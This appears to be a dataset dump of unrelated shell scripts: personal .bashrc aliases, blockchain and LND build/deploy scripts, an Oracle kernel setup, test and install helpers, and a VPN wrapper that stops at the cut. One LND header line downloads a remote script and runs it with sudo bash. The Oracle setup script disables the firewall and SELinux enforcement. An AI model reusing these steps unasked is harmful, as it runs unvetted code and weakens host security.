blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
60050e75252eb6ed6a4a70d83efbcd844c9eab22 | Shell | s4ur4b/Shell-Scripting | /day5-sequence/Practise/pb2_2_2.sh | UTF-8 | 324 | 3.359375 | 3 | [] | no_license | read -p "enter a number for week day: " n
# Print the weekday name that corresponds to the number read above ($n).
echo "the week day is - "
case "$n" in
	0) echo "enter a value between 1 and 7" ;;
	1) echo "sunday" ;;
	2) echo "monday" ;;
	3) echo "tuesday" ;;
	4) echo "wednesday" ;;
	5) echo "thursday" ;;
	6) echo "friday" ;;
	7) echo "saturday" ;;
	*) echo "There are only seven days in a week" ;;
esac
| true |
e346bdb9f361c27060691cecae6581a27bf03255 | Shell | 6piR/ginseng | /script/.bashrc | UTF-8 | 8,369 | 3.328125 | 3 | [] | no_license | # ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
# (PS1 is only set for interactive shells, so an empty PS1 means non-interactive)
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# don't overwrite GNU Midnight Commander's setting of `ignorespace'.
HISTCONTROL=$HISTCONTROL${HISTCONTROL+,}ignoredups
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
# tput setaf 1 succeeding means the terminal understands ANSI color codes
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# some more ls aliases
#alias la='ls -A'
#alias l='ls -CF'
# --- personal editing / cleanup shortcuts ---
alias bashrc='gedit ~cipiere/.bashrc &'
alias clearfullapi='rm -r api/;rm *.pl; rm *~'
alias clearapi='rm -r api/; rm *~'
# --- "go*" shortcuts: cd into local work dirs or ssh into lab hosts ---
alias gobackup='cd /tmp/quattor/backup/network_component;t2'
alias gocrri='ssh secipier@hpc1.clermont-universite.fr'
alias goerror='cd /tmp/quattor/error/network_component;t2'
alias gofc='ssh cipiere@fc.isima.fr'
alias Xgofc='ssh -X cipiere@fc.isima.fr'
alias gonote='cd /home/cipiere/Documents/ginseng/note'
alias goginseng='cd /home/cipiere/Documents/ginseng'
alias gogithub='cd /home/cipiere/Documents/github'
alias gog2imfc='ssh g2im@fc.isima.fr'
alias gog2imwebcrri='ssh g2im@193.55.252.158'
alias gog2imcrri='ssh g2imweb@193.55.252.153'
alias gowebcrri='ssh secipier@193.55.252.158'
alias gomysqlcrri='ssh secipier@193.55.252.158'
alias gohtml='google-chrome api/html/index.html &'
alias gohispod="cd /home/cipiere/Documents/synchro_git/hispod"
alias goperl='cd /home/cipiere/Documents/ginseng/perl/;t2'
alias goplanning='cd /home/checkeol/Bureau/_Stage/planning;t2'
alias gorapport='cd /home/checkeol/Bureau/_Stage/rapport;t2'
alias goremote='rdesktop lbts01 -g 1500x1000 -u scipiere'
alias gospe='cd /home/checkeol/Bureau/_Stage/rapport/specifications;t2'
alias gostage='cd /home/checkeol/Bureau/_Stage;t2'
alias gosvn='cd /home/checkeol/Bureau/_Stage/Perl/SVN_code/;t2'
alias gotest='cd /home/checkeol/Bureau/_Stage/Perl/test;t2'
alias gotmp='cd /tmp/quattor;tree'
alias goui='ssh 193.55.252.161 -l secipier' #ui.lifegrid.fr
alias gofaouzi='ssh 193.55.252.161 -l fajaziri' #ui.lifegrid.fr
alias gotron='ssh 172.16.66.63 -l root' #CentOS 5.5 DHCP bureau C103 machine cipiere
# --- ls variants ---
alias lg='ls | grep'
alias lga='lla | grep'
alias lla='ls -alh'
alias ll='ls -lh'
# NOTE(review): 'ln' here shadows /bin/ln (the link command) for interactive use.
alias ln='ls -rlth'
alias lna='ls -rltha'
# --- local service start/stop helpers ---
alias startsamba='/etc/rc.d/init.d/smb start'
alias stopsamba='/etc/rc.d/init.d/smb stop'
alias startcups='/etc/init.d/cups start'
alias stopcups='/etc/init.d/cups stop'
# --- tree shortcuts (t2/tree2 = depth 2, tf/treeflat = flat full paths) ---
alias t0='tree -L 1 -d'
alias t1='tree -L 1'
alias t2='tree2'
alias t2a='tree2 -a'
alias t3='tree -L 3'
alias t4='tree -L 4'
alias tf='tree -fi'
alias tg='treeflat | grep'
alias tga='treeflat -a | grep'
alias tree2='tree -L 2'
alias treeflat='tree -fi'
alias vi='vim'
# Open the daily reading list (comics, music, mail, calendar) in Chrome,
# one tab per URL, in the same order as before.
function himylord() {
local url
for url in \
"http://xkcd.com/" \
"http://cereales.lapin.org/" \
"http://oglaf.lapin.org/index.php" \
"http://oglaf.com/" \
"http://grooveshark.com/#/cipiere/music/favorites" \
"https://mail.google.com/mail/?hl=fr#inbox" \
"https://www.google.com/calendar/render?tab=mc" \
"https://clrwww.in2p3.fr/mail/"; do
google-chrome "$url"
done
}
# Search the four Amazon storefronts (.com/.fr/.co.uk/.de) for a keyword.
# $1 - search term. It is now inside the quotes so a term containing shell
#      glob characters no longer triggers word-splitting/globbing.
function amazon() {
local domain
for domain in com fr co.uk de; do
google-chrome "http://www.amazon.${domain}/s/ref=nb_sb_noss?__mk_fr_FR=%C5M%C5Z%D5%D1&url=search-alias%3Daps&field-keywords=+$1"
done
}
# Browser lookup helpers. $1 is the search/lookup term; it is now quoted as
# part of the URL so unquoted-expansion globbing/splitting cannot occur.
# NOTE(review): 'go' shadows the Go toolchain binary for interactive shells.
function search() { google-chrome "http://www.google.fr/search?hl=fr&source=hp&q=$1" & }
function go() { google-chrome "http://www.google.fr/search?hl=fr&source=hp&q=$1" & }
function enfr() { google-chrome "http://www.wordreference.com/enfr/$1"; }
function fren() { google-chrome "http://www.wordreference.com/fren/$1"; }
function conjugaison() { google-chrome "http://www.la-conjugaison.fr/du/verbe/$1.php"; }
# scp helpers: push (cp2*) / pull (cpfrom*) a single file between this
# machine and the lab hosts. $1 is the file name; it is now quoted so file
# names containing spaces or glob characters are passed intact.
function cpgw() { scp "$1" scipiere@lbgw: ;}
function cp2ui() { scp "$1" secipier@193.55.252.161:from_c103/ ;}
function cp2faouzi() { scp "$1" fajaziri@193.55.252.161:/home/fajaziri/phylgrid/"$1" ;}
function cp2fc() { scp "$1" cipiere@fc.isima.fr:/home/etud/cipiere/from_outside/"$1" ;}
function cp2hispodfc() { scp "$1" g2im@fc.isima.fr:/home/ext/g2im/HISPOD/"$1" ;}
function cp2webcrri() { scp "$1" secipier@193.55.252.158:/home/secipier/public_html/"$1" ;}
function cp2crri() { scp "$1" secipier@193.55.252.158:/home/secipier/ginseng/csv/"$1" ;}
function cp2mysqlcrri() { scp "$1" secipier@193.55.252.158:/home/secipier/ginseng/csv/"$1" ;}
function cpfromfc() { scp cipiere@fc.isima.fr:/home/etud/cipiere/to_export/"$1" ./"$1" ;}
function cpfromfaouzi() { scp fajaziri@193.55.252.161:/home/fajaziri/phylgrid/"$1" ./"$1";}
function cpfromphylclustercrri() { scp secipier@193.55.252.153:/home/secipier/phylcluster/"$1" . ;}
function cpfromwebg2im() { scp secipier@193.55.252.158:/home/secipier/public_html/"$1" . ;}
function cpfromg2imresult() { scp g2im@fc.isima.fr:/home/ext/g2im/public_html/hispod/results/"$1" /home/cipiere/Documents/synchro_git/hispod/hispod_pc/fromg2im/"$1";}
function cpfromg2im() { scp g2im@fc.isima.fr:/home/ext/g2im/HISPOD/"$1" /home/cipiere/Documents/synchro_git/hispod/hispod_pc/fromg2im/"$1";}
# Compile and push a hispod binary + its driver script.
# NOTE(review): cp2g2im is not defined in this file — presumably sourced from
# elsewhere; verify before relying on hispod_export.
function hispod_export() { gcc "$1".iUBDegen.c -o "$1".IUBREV.cipiere; cp2g2im "$1".IUBREV.cipiere; cp2g2im "$1".hispod_pc.pl;}
# Print the path to the doxygen filter directory (alias) and also keep it
# in a variable for use in other commands.
alias doxy='echo "/home/checkeol/Bureau/_Stage/Perl/SVN_code/doxy_filter"'
doxy="/home/checkeol/Bureau/_Stage/Perl/SVN_code/doxy_filter"
# Unfinished idea (translated from French): "to finish some day or not...
# to take parameters, use a function instead of an alias".
#alias 2doxy="cp $1 $doxy/" #A finir un jour ou pas .... Pour prendre des paramètres utiliser function
#;cd $doxy;t2'
#;doxygen $1;'
# Quick upward navigation: cdN climbs N directories.
alias cd..='cd ..'
alias cd2='cd ../..'
alias cd3='cd ../../..'
alias cd4='cd ../../../..'
alias cd5='cd ../../../../..'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
# Skipped when bash runs in POSIX mode (shopt -oq posix tests that option).
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
| true |
fd12341efc88d5639083c42726e3f01dc454152e | Shell | tangz1987/celo-monorepo | /packages/protocol/scripts/bash/deploy_release_contracts.sh | UTF-8 | 1,709 | 3.9375 | 4 | [
"Apache-2.0",
"LGPL-3.0-only",
"LGPL-2.1-or-later"
] | permissive | #!/usr/bin/env bash
set -euo pipefail
# Deploys all grants detailed in `GRANTS_FILE` from the corresponding entity.
#
# Flags:
# -n: Name of the network to upgrade
# -f: Address of the account deploying the grant
# -g: File containing grant information
# -s: Amount of gold for beneficiary to start with for transactions
# -o: (Optional) File to output results to
# -really: (Optional) Reply "yes" to prompts about deploying grants (Be careful!)
#
# Example:
# `./scripts/bash/deploy_release_contracts.sh -n development -f scripts/truffle/releaseGoldContracts.json -g 50`
# Defaults: empty strings mean "not provided"; mandatory ones are checked below.
NETWORK=""
GRANTS_FILE=""
FROM=""
START_GOLD=""
OUTPUT_FILE=""
REALLY=""
# Parse the command-line flags documented above. The unknown-flag branch
# previously called an undefined `error` function, which would itself fail
# with "command not found"; report to stderr and exit explicitly instead.
while getopts 'n:f:g:s:o:r:' flag; do
  case "${flag}" in
    n) NETWORK="$OPTARG" ;;
    f) FROM="${OPTARG}" ;;
    g) GRANTS_FILE="${OPTARG}" ;;
    s) START_GOLD="${OPTARG}" ;;
    o) OUTPUT_FILE="${OPTARG}" ;;
    r) REALLY="--yesreally" ;;
    *) echo "Unexpected option ${flag}" >&2; exit 1 ;;
  esac
done
# Validate mandatory flags, defaulting the optional ones.
[ -z "$NETWORK" ] && echo "Need to set the NETWORK via the -n flag" && exit 1;
[ -z "$FROM" ] && echo "Need to set the FROM address via the -f flag" && exit 1;
# Was a bare `exit`, which returned 0 (the status of the preceding echo) and
# let callers think a run with no grants file had succeeded. Exit 1 instead.
[ -z "$GRANTS_FILE" ] && echo "Need to set the GRANTS_FILE via the -g flag" && exit 1;
[ -z "$START_GOLD" ] && echo "No starting gold provided via -s flag: defaulting to 1cGld" && START_GOLD=1;
[ -z "$OUTPUT_FILE" ] && echo "No output file provided, will print output to console."
# A local node must be listening on the default RPC port before deploying.
if ! nc -z 127.0.0.1 8545 ; then
echo "Port 8545 not open"
exit 1
fi
# Variables are intentionally unquoted here: empty optional flags (e.g.
# OUTPUT_FILE) must vanish rather than become empty arguments.
# (Removed a stray trailing backslash that left the command line open.)
yarn run build && \
yarn run truffle exec ./scripts/truffle/deploy_release_contracts.js \
--network $NETWORK --from $FROM --grants $GRANTS_FILE --start_gold $START_GOLD --output_file $OUTPUT_FILE $REALLY --build_directory $PWD/build/$NETWORK
d4b2d478f110c186e861c5f25525f2b4f783720e | Shell | dhnomura/install-grid-oracle-single-19 | /customize_kernel.sh | UTF-8 | 1,121 | 2.53125 | 3 | [] | no_license | #!/bin/bash
# Append the Oracle-recommended per-user resource limits for the grid and
# oracle accounts to /etc/security/limits.conf (appended, not replaced).
echo "
grid soft nproc 2047
grid hard nproc 16384
grid soft nofile 1024
grid hard nofile 65536
grid soft stack 10240
grid hard stack 32768
oracle soft nproc 2047
oracle hard nproc 16384
oracle soft nofile 1024
oracle hard nofile 65536
oracle soft stack 10240
oracle hard stack 32768
" >> /etc/security/limits.conf
# Write the Oracle kernel/network tunables into their own sysctl drop-in
# file, then apply them immediately with sysctl -p.
echo "fs.file-max = 6815744
kernel.sem = 250 32000 100 128
kernel.shmmni = 4096
kernel.shmall = 1073741824
kernel.shmmax = 4398046511104
kernel.panic_on_oops = 1
net.core.rmem_default = 262144
net.core.rmem_max = 4194304
net.core.wmem_default = 262144
net.core.wmem_max = 1048576
net.ipv4.conf.all.rp_filter = 2
net.ipv4.conf.default.rp_filter = 2
fs.aio-max-nr = 1048576
net.ipv4.ip_local_port_range = 9000 65500
" > /etc/sysctl.d/98-oracle.conf
/sbin/sysctl -p /etc/sysctl.d/98-oracle.conf
# Disable the firewall (required for Oracle RAC/grid interconnect setup).
systemctl stop firewalld
systemctl disable firewalld
# Put SELinux into permissive mode in the persistent config.
# BUG FIX: the original `if SELINUX == "enforcing"; then` tried to execute a
# command named SELINUX (always "command not found"), so the sed never ran.
# It must be a [ ] test on the variable. Also modernized backticks to $( )
# and dropped the useless `cat |`.
SELINUX=$(grep '^SELINUX=' /etc/selinux/config | awk -F "=" '{print $2}')
if [ "$SELINUX" = "enforcing" ]; then
	sed -i 's/enforcing/permissive/g' /etc/selinux/config
fi
# Apply permissive mode to the running kernel as well.
setenforce Permissive
# Avahi mDNS conflicts with Oracle SCAN name resolution; turn it off.
service avahi-daemon stop
chkconfig avahi-daemon off
06be773cf9d64fedd00e5d2aee1d5c563e1ad240 | Shell | k3tan172/bitcoin-tutorials | /lnd.updates/lnd.from.source.sh | UTF-8 | 1,999 | 3.515625 | 4 | [] | no_license | # LND Update Script
# Download and run this script on the RaspiBlitz:
# $ wget https://raw.githubusercontent.com/openoms/bitcoin-tutorials/master/lnd.updates/lnd.from.source.sh && sudo bash lnd.from.source.sh
#### Build from Source
# To quickly catch up get latest patches if needed
repo="github.com/lightningnetwork/lnd"
# Interactively ask which commit to build; an empty answer means "tip of master".
echo "Paste the latest or desired commit ID to checkout from"
echo "See the list at: https://github.com/lightningnetwork/lnd/commits/master"
echo "Example:"
echo "4068e78af690f9b4a598de1f3f0b21b5560dd146"
echo "(if left empty will use the latest state of the master branch)"
echo "and press ENTER"
read commit
# commit="580509191007617afa6da4b6b0151b4b5313eb72"
# BUILDING LND FROM SOURCE
echo "*** Build LND from Source ***"
echo "repo=${repo}"
echo "up to the commit=${commit}"
# Stop the running daemon before replacing its binaries.
sudo systemctl stop lnd
# Go toolchain environment (GOPATH-style build, pre-modules layout).
export GOROOT=/usr/local/go
export PATH=$PATH:$GOROOT/bin
export GOPATH=/usr/local/gocode
export PATH=$PATH:$GOPATH/bin
echo "Deleting old source..."
sudo rm -r /usr/local/gocode/src/github.com/lightningnetwork/lnd
# -d: download the source only, do not install yet.
go get -d $repo
echo "Building LND..."
cd $GOPATH/src/${repo}
# With an empty $commit this is a bare `git checkout` (a no-op on the
# current branch), so "latest master" is what gets built.
sudo git checkout ${commit}
make && make install
sudo chmod 555 /usr/local/gocode/bin/lncli
sudo chmod 555 /usr/local/gocode/bin/lnd
# Make the go binaries reachable for the admin, pi and bitcoin users.
sudo bash -c "echo 'export PATH=$PATH:/usr/local/gocode/bin/' >> /home/admin/.bashrc"
sudo bash -c "echo 'export PATH=$PATH:/usr/local/gocode/bin/' >> /home/pi/.bashrc"
sudo bash -c "echo 'export PATH=$PATH:/usr/local/gocode/bin/' >> /home/bitcoin/.bashrc"
# Sanity check: an empty `lncli --version` output means the build failed.
lndVersionCheck=$(lncli --version)
if [ ${#lndVersionCheck} -eq 0 ]; then
echo "FAIL - Something went wrong with building LND from source."
echo "Sometimes it may just be a connection issue. Reset to fresh Rasbian and try again?"
exit 1
fi
echo ""
echo "** Link to /usr/local/bin ***"
# NOTE(review): ln -s without -f will fail if the links already exist from a
# previous run of this update script — confirm whether -f is wanted here.
sudo ln -s /usr/local/gocode/bin/lncli /usr/local/bin/lncli
sudo ln -s /usr/local/gocode/bin/lnd /usr/local/bin/lnd
sudo systemctl restart lnd
echo ""
echo "LND VERSION INSTALLED: ${lndVersionCheck} up to commit ${commit} from ${repo}"
343830efd2bdf1140e0a489666fb9db6e94bcd17 | Shell | Mbote-Joseph/System-Programming | /ASSIGNMENT/question7.sh | UTF-8 | 471 | 3.015625 | 3 | [] | no_license | #! /bin/bash
# Read all recipient addresses from email_addresses.txt (one per line) and
# join them into a single space-separated string.
# BUG FIX: this was `alias allEmails=...`, but aliases are not expanded in
# non-interactive scripts and never in an argument position, so `mail` was
# sent to a literal recipient named "allEmails". Use a plain variable.
allEmails=$(cat email_addresses.txt | tr -s '\n' ' ')
Message="Inviting the you as our computing student to our 21st Open Webinar on innovation incubation scheduled for Friday, 25th June 2021 from 10:00 A.M. The Zoom link for joining in on Friday is as given below. We shall also broadcast the webinar on our youtube channel. Youtube link: https://youtu.be/ONVTA7LKMIs"
# $allEmails is deliberately unquoted so each address becomes its own
# recipient argument to mail.
echo "$Message" | mail -s "invite to a COVID -19 programming webinar" $allEmails
25af5249c8d5104a05e552ff3e28052bd33d09a0 | Shell | o-ran-sc/ric-plt-lib-rmr | /doc/src/rtd/scrape_types.sh | UTF-8 | 3,427 | 3.21875 | 3 | [
"CC-BY-4.0",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | # :vim setet ts=4 sw=4:
#==================================================================================
# Copyright (c) 2020 Nokia
# Copyright (c) 2020 AT&T Intellectual Property.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==================================================================================
# Mnemonic: scrape_types.sh
# Abstract: This parses the RIC_msg_types header file and geneates
# some doc. See the header file for a description of what
# is recognised by this parser.
# Date: 23 June 2020
# Author: E. Scott Daniels
# ----------------------------------------------------------------------------------
sdir="../../../docs" # dir where RTD scraper looks
input=../../../src/rmr/common/include/RIC_message_types.h
xsrc=/tmp/PID$$.xfm
export XFM_OUTPUT_TYPE=rst # it should be this
out_suffix=rst
# Command-line options: -o <type> sets the xfm output type (and the output
# file suffix); -t <dir> overrides the target docs directory.
while [[ $1 == -* ]]
do
case $1 in
-o) export XFM_OUTPUT_TYPE=$2
out_suffix=$2
shift
;;
-t) sdir=$2; shift;;
esac
shift
done
export OUTPUT_TYPE=$XFM_OUTPUT_TYPE # compat with project setup
# Emit the xfm document preamble into the scratch source file.
cat <<endKat >$xsrc
.** CAUTION:
.** This {X}fm source is generated by $0 in $PWD. Any edits
.** are very likely to be lost.
.**
.dv doc_title RIC Message Types
.im setup.im
endKat
# Strip leading spaces from the header file and translate its #define lines
# and specially-marked comment blocks (/*+ ... */, //+, //-, //--) into xfm
# markup, appended to the scratch source file.
sed 's/^ *//' $input | awk '
BEGIN {
space_ok = 1
off = 0 # snarf types
anything = 1
desc = 2
}
# starting with token stk, build remaining tokens into a record
function build_rec( stk ) {
rec = ""
for( ; stk <= NF; stk++ ) {
rec = rec $(stk) " "
}
return rec
}
# ------------------------------------------------------------------------
snarf && /^$/ && space_ok {
printf( "&space\n\n" );
space_ok = 0 # eat multiple blank lines
if( snarf == desc ) {
snarf = off
}
next
}
$1 == "/*+" {
expect_header = 1
snarf = anything
space_ok = 1
next
}
expect_header {
if( dl_open ) {
printf( "&end_dlist\n" );
dl_open = 0
}
printf( "\n&h2(%s)\n", $0 )
space_ok = 1
expect_header = 0
next
}
snarf && $1 == "*/" {
snarf = off
space_ok = 0
next
}
/^#[ ]*define/ {
if( $4 == "//--" ) { # ignored completely
next
}
if( ! dl_open ) {
printf( "\n&beg_dlist( 1.5i Helvetica-bold : : 30,70) \n" )
dl_open = 1
}
if( $4 == "//+" ) {
printf( "&di(%s) %s\n", $2, build_rec( 5 ) )
} else {
if( $4 == "//-" ) {
printf( "&di(%s) deprecated\n", $2 )
} else {
printf( "&di(%s) &break\n", $2 )
}
}
snarf = desc; # snarf next only if //+ is the first token
next
}
snarf == desc {
if( $1 == "//+" ) { # continued description, add it on
printf( "%s\n", build_rec( 5 ) )
} else {
snarf = off
}
next
}
snarf == anything {
print
next
}
END {
if( dl_open ) {
printf( "&end_dlist\n" );
}
printf( ".qu\n" )
}
' >>$xsrc
# Render the xfm source to the final doc, trimming a single leading space and
# trailing blanks per line, then remove the scratch files.
tfm $xsrc stdout | sed 's/^ //; s/ *$//' >$sdir/msg_types.$out_suffix
rm -f /tmp/PID$$.*
| true |
7235c2133d3c9f641e9afb925c9c59d1a866bc9d | Shell | jonmarty/deepops-fbl-ood | /workloads/jenkins/scripts/test-monitoring.sh | UTF-8 | 3,583 | 3.296875 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
# Install monitoring with persistance, verify it deletes, re-install without persistance, verify DCGM metrics, verify it deletes
# We disable/re-enable "-e" in this script because polling will error until service come up and we want to collect output and debug
set -ex
source workloads/jenkins/scripts/jenkins-common.sh
# Ensure working directory is root
cd "${ROOT_DIR}"
# Deploy Monitoring
# (sourced, not executed: it exports prometheus_url/grafana_url/alertmanager_url)
source ./scripts/k8s/deploy_monitoring.sh
# The deployment script exports the http endpoints, verify it returns a 200
# It typically takes ~1 minutes for all pods and services to start, so we poll
timeout=600
time=0
set +e # This polling is expected to fail, so remove the -e flag for the loop
# Poll all three monitoring endpoints every 15s until they all respond or
# the 600s budget is exhausted.
while [ ${time} -lt ${timeout} ]; do
curl -s --raw -L "${prometheus_url}" | grep Prometheus && \
curl -s --raw -L "${grafana_url}" | grep Grafana && \
curl -s --raw -L "${alertmanager_url}" | grep Alertmanager && \
echo "Monitoring URLs are all responding" && \
pass=true && break
let time=$time+15
sleep 15
done
# Fail if timed out
if [ "${pass}" != "true" ]; then
echo "Timed out getting monitoring responses"
# Dump the raw responses as debug output before failing the job.
curl -s --raw -L "${prometheus_url}"
curl -s --raw -L "${grafana_url}"
curl -s --raw -L "${alertmanager_url}"
exit 1
fi
set -e # The loop is done, and we got debug if it failed, re-enable fail on error
# Verify that the polling option agrees that things are up
./scripts/k8s/deploy_monitoring.sh -w
# TODO: Create a test to verify storage is persisting
# Delete Monitoring (this should take ~30 seconds)
./scripts/k8s/deploy_monitoring.sh -d
set +e
# After deletion, any endpoint still responding is a failure.
curl -s --raw -L "${prometheus_url}" | grep Prometheus && \
curl -s --raw -L "${grafana_url}" | grep Grafana && \
curl -s --raw -L "${alertmanager_url}" | grep Alertmanager && \
echo "Monitoring URLs are all responding when they should have been deleted" && \
exit 1
set -e
# Deploy Monitoring without persistent data (this should be faster because containers have already been downloaded)
source ./scripts/k8s/deploy_monitoring.sh -x
# The deployment script exports the http endpoints, verify it returns a 200
# It typically takes ~1 minutes for all pods and services to start, so we poll
# (same polling pattern as the persistent-storage deployment above)
timeout=600
time=0
set +e # This polling is expected to fail, so remove the -e flag for the loop
while [ ${time} -lt ${timeout} ]; do
curl -s --raw -L "${prometheus_url}" | grep Prometheus && \
curl -s --raw -L "${grafana_url}" | grep Grafana && \
curl -s --raw -L "${alertmanager_url}" | grep Alertmanager && \
echo "Monitoring URLs are all responding" && \
pass=true && break
let time=$time+15
sleep 15
done
# Fail if timed out
if [ "${pass}" != "true" ]; then
echo "Timed out getting monitoring responses"
curl -s --raw -L "${prometheus_url}"
curl -s --raw -L "${grafana_url}"
curl -s --raw -L "${alertmanager_url}"
exit 1
fi
set -e # The loop is done, and we got debug if it failed, re-enable fail on error
# Get some debug for Pods that did/didn't come up and verify DCGM metrics
kubectl get all -n monitoring
bash -x ./workloads/jenkins/scripts/test-dcgm-metrics.sh slurm-node # We use slurm-node here because it is GPU only, kube-node includes the mgmt plane
# Delete Monitoring
./scripts/k8s/deploy_monitoring.sh -d
set +e
# Final verification: all endpoints must be gone after the delete.
curl -s --raw -L "${prometheus_url}" | grep Prometheus && \
curl -s --raw -L "${grafana_url}" | grep Grafana && \
curl -s --raw -L "${alertmanager_url}" | grep Alertmanager && \
echo "Monitoring URLs are all responding when they should have been deleted" && \
exit 1
set -e
| true |
725999785eccf7c1448853b5d3700943024f0da9 | Shell | phoronix-test-suite/test-profiles | /pts/blender-3.3.1/install.sh | UTF-8 | 500 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# Unpack the Blender binary release and the Cycles benchmark scenes, then
# move the .blend scene files into the home directory where the test
# profile expects them.
tar -xf blender-3.3.0-linux-x64.tar.xz
unzip -o cycles_benchmark_20160228.zip
mv benchmark/bmw27/*.blend ~
mv benchmark/classroom/*.blend ~
mv benchmark/fishy_cat/*.blend ~
mv benchmark/pabellon_barcelona/*.blend ~
rm -rf benchmark
# Generate the wrapper script that the test harness invokes. The \$ escapes
# keep the variables literal so they expand when the wrapper runs, not now.
# When the test args request CPU rendering, the wrapper rewrites any
# "_gpu" token in the args to "_cpu".
echo "#!/bin/bash
cd blender-3.3.0-linux-x64
BLEND_ARGS=\$@
if [[ \$@ =~ .*CPU.* ]]
then
BLEND_ARGS=\${BLEND_ARGS/_gpu/_cpu}
fi
./blender \$BLEND_ARGS > \$LOG_FILE 2> /dev/null
echo \$? > ~/test-exit-status
rm -f output.test" > blender
chmod +x blender
4cb8ae5ce1a6b40704948691f9e425248a440dfe | Shell | JeffreyDeYoung/linux-helpers | /codeFormatJava.zsh | UTF-8 | 782 | 3.703125 | 4 | [] | no_license | #!/bin/zsh
#author: Jeffrey DeYoung
#Use to code format java files per the google style guide.
#Eclipse is required for this script to work; it's basically wrapping an Eclipse command.
#Requires zsh because I don't want to write an if statment for bash.
#
#To use, add to your shells .zshrc or .bashrc file.
#Ex:
#ECLIPSE_BIN=~/eclipse/java-neon/eclipse/eclipse
#source ~/projects/linux-helpers/codeFormatJava.zsh

function codeFormatJava()
{
called=$_
echo "Performing Java Code Format per Google Style Guide on current directory: `pwd`..."
#echo $called
# ${(%):-%x} is zsh prompt-expansion for "path of the file being sourced";
# DIR therefore points at the directory holding this script (and its prefs file).
DIR=$(dirname ${(%):-%x})
#echo $DIR
# Headless Eclipse invocation: format every Java file under the current
# directory using the bundled org.eclipse.jdt.core.prefs profile.
$ECLIPSE_BIN -nosplash -application org.eclipse.jdt.core.JavaCodeFormatter -config $DIR/org.eclipse.jdt.core.prefs .
}

#handy alias for calling this
alias javaformat="codeFormatJava"
13d95237b5f492754e5284244a74c2ccb6a67fa5 | Shell | dorucioclea/iguanavpn-cli | /lib/vpn-wrapper.sh | UTF-8 | 2,029 | 3.9375 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env nix-shell
#! nix-shell vpn-wrapper.nix -i bash
# Strict mode: abort on errors, failed pipeline stages and unset variables.
set -o errexit
set -o pipefail
set -e
set -u
# set -x
# Absolute directory of this script (used to locate vpn-keepalive.sh later).
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
# Tool locations resolved from PATH (provided by the nix shell).
OPENCONNECT=$(which openconnect)
VPNSLICE=$(which vpn-slice)
WITH_VPNSLICE=true
# ANSI SGR codes used by the out/err/info helpers below.
ERR=31
INFO=32
BOLD=1
NORM=0
# Emit one colour-escaped line.
#   $1 - SGR weight (0 normal / 1 bold)
#   $2 - SGR colour code
#   $3+ - message text (joined with spaces)
out() {
  local weight=$1 colour=$2
  shift 2
  echo -e "\e[${weight};${colour}m$*\e[0m"
}
# Bold red error text.
err() {
  out "$BOLD" "$ERR" "$@"
}
# Normal green informational text.
info() {
  out "$NORM" "$INFO" "$@"
}
# Require config name and password; the vpn-slice toggle is optional.
if [[ $# -lt 2 ]]; then
